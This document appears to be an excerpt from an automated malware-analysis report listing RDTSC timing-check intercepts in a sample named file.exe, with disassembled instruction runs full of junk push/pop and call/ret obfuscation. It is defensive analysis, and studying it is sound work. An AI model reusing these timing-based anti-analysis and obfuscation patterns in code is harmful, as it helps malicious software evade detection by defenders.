                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4978F7 second address: 4978FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499883 second address: 49988A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A850 second address: 49A85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B794 second address: 49B7DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB580h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FA49CDAB578h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a add bx, 7602h 0x0000002f push eax 0x00000030 push edi 0x00000031 push eax 0x00000032 push edx 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D719 second address: 49D71F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E75E second address: 49E7DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB580h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FA49CDAB578h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov edi, edx 0x00000028 push 00000000h 0x0000002a mov ebx, dword ptr [ebp+122D3169h] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007FA49CDAB578h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c mov bl, C4h 0x0000004e js 00007FA49CDAB577h 0x00000054 cmc 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FA49CDAB57Ch 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E7DF second address: 49E7E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E7E5 second address: 49E7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E7E9 second address: 49E7FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FA49D1B33C6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E7FB second address: 49E7FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F8BE second address: 49F8C8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA49D1B33C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498A3B second address: 498A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007FA49CDAB588h 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FA49CDAB576h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498A51 second address: 498A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AAB0 second address: 49AAB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D8ED second address: 49D90B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnc 00007FA49D1B33C6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E9CA second address: 49E9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FA49CDAB57Ch 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F9F2 second address: 49F9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1A78 second address: 4A1AA2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FA49CDAB57Bh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e jmp 00007FA49CDAB584h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1AA2 second address: 4A1B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 nop 0x00000007 mov bx, si 0x0000000a add dword ptr [ebp+122D3097h], edi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov edi, dword ptr [ebp+1247052Ah] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007FA49D1B33C8h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e and edi, 7C20EA1Ch 0x00000044 mov eax, dword ptr [ebp+122D0B59h] 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007FA49D1B33C8h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 00000017h 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 jmp 00007FA49D1B33D9h 0x00000069 push FFFFFFFFh 0x0000006b sub bx, D3C5h 0x00000070 push eax 0x00000071 js 00007FA49D1B33D2h 0x00000077 jo 00007FA49D1B33CCh 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2A3D second address: 4A2A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ACFDA second address: 4ACFF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ACFF4 second address: 4ACFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD135 second address: 4AD140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA49D1B33C6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD140 second address: 4AD14F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jp 00007FA49CDAB576h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD3F7 second address: 4AD3FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AFDEC second address: 4AFE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA49CDAB57Dh 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FA49CDAB57Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AFE0B second address: 4AFE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA49D1B33CEh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4108 second address: 4B410F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B78A5 second address: 4B78AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B78AB second address: 4B78DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA49CDAB576h 0x0000000a jp 00007FA49CDAB576h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FA49CDAB581h 0x00000017 jmp 00007FA49CDAB57Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B83BD second address: 4B83C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B83C1 second address: 4B83CB instructions: 0x00000000 rdtsc 0x00000002 js 00007FA49CDAB576h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B8671 second address: 4B8675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B87D9 second address: 4B87DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A388F second address: 4A3894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3894 second address: 4A3899 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3899 second address: 4A389F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A389F second address: 4A38B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jp 00007FA49CDAB584h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A38B0 second address: 4A38B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B8914 second address: 4B891A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45135E second address: 451364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 451364 second address: 451378 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007FA49CDAB576h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE4D5 second address: 4BE4DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD391 second address: 4BD39F instructions: 0x00000000 rdtsc 0x00000002 js 00007FA49CDAB576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48972D second address: 489744 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA49D1B33C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 jnp 00007FA49D1B33C6h 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489744 second address: 4897A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB588h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FA49CDAB578h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+1247B490h] 0x0000002a jc 00007FA49CDAB57Ch 0x00000030 mov edx, dword ptr [ebp+122D252Fh] 0x00000036 mov dx, 3000h 0x0000003a push eax 0x0000003b jbe 00007FA49CDAB582h 0x00000041 je 00007FA49CDAB57Ch 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489F6C second address: 489F7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489FDA second address: 489FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489FDE second address: 489FF0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA49D1B33C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FA49D1B33C6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489FF0 second address: 48A008 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA49CDAB576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e jnl 00007FA49CDAB576h 0x00000014 pop ebx 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A0FC second address: 48A100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A100 second address: 48A188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA49CDAB57Ch 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FA49CDAB578h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a add edx, 1CD8BC99h 0x00000030 push 00000004h 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007FA49CDAB578h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c pushad 0x0000004d jmp 00007FA49CDAB57Bh 0x00000052 jno 00007FA49CDAB57Ch 0x00000058 popad 0x00000059 xor edx, 5CDF4436h 0x0000005f nop 0x00000060 push esi 0x00000061 je 00007FA49CDAB57Ch 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A53B second address: 48A541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A66C second address: 48A67F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007FA49CDAB588h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A67F second address: 48A683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A86A second address: 48A86E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A86E second address: 48A888 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47281D second address: 472821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 472821 second address: 472855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33D5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA49D1B33D6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD6AA second address: 4BD6B4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA49CDAB57Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDBE8 second address: 4BDBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDBEE second address: 4BDC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49CDAB57Dh 0x00000009 popad 0x0000000a push esi 0x0000000b jo 00007FA49CDAB576h 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDD9A second address: 4BDDA8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA49D1B33C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDDA8 second address: 4BDDAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDDAC second address: 4BDDB8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA49D1B33C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDDB8 second address: 4BDDBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDDBE second address: 4BDDC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE04B second address: 4BE051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE051 second address: 4BE055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE055 second address: 4BE09A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB583h 0x00000007 jmp 00007FA49CDAB583h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007FA49CDAB587h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5D39 second address: 4C5D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5D3E second address: 4C5D5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA49CDAB582h 0x00000009 je 00007FA49CDAB576h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5FDF second address: 4C5FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C57AB second address: 4C57BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB57Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C57BA second address: 4C57C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF757 second address: 4CF763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF763 second address: 4CF767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF915 second address: 4CF91B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFA80 second address: 4CFA88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFA88 second address: 4CFA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFA8C second address: 4CFAB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CCh 0x00000007 jmp 00007FA49D1B33CDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FA49D1B33C6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFAB1 second address: 4CFABB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA49CDAB576h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0143 second address: 4D0147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0147 second address: 4D016A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jo 00007FA49CDAB576h 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop ecx 0x00000019 jmp 00007FA49CDAB57Ah 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D066D second address: 4D0673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D30C5 second address: 4D30E0 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA49CDAB57Eh 0x00000008 jnc 00007FA49CDAB576h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jnl 00007FA49CDAB57Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2C7A second address: 4D2C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49D1B33D8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2C96 second address: 4D2CAB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FA49CDAB57Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
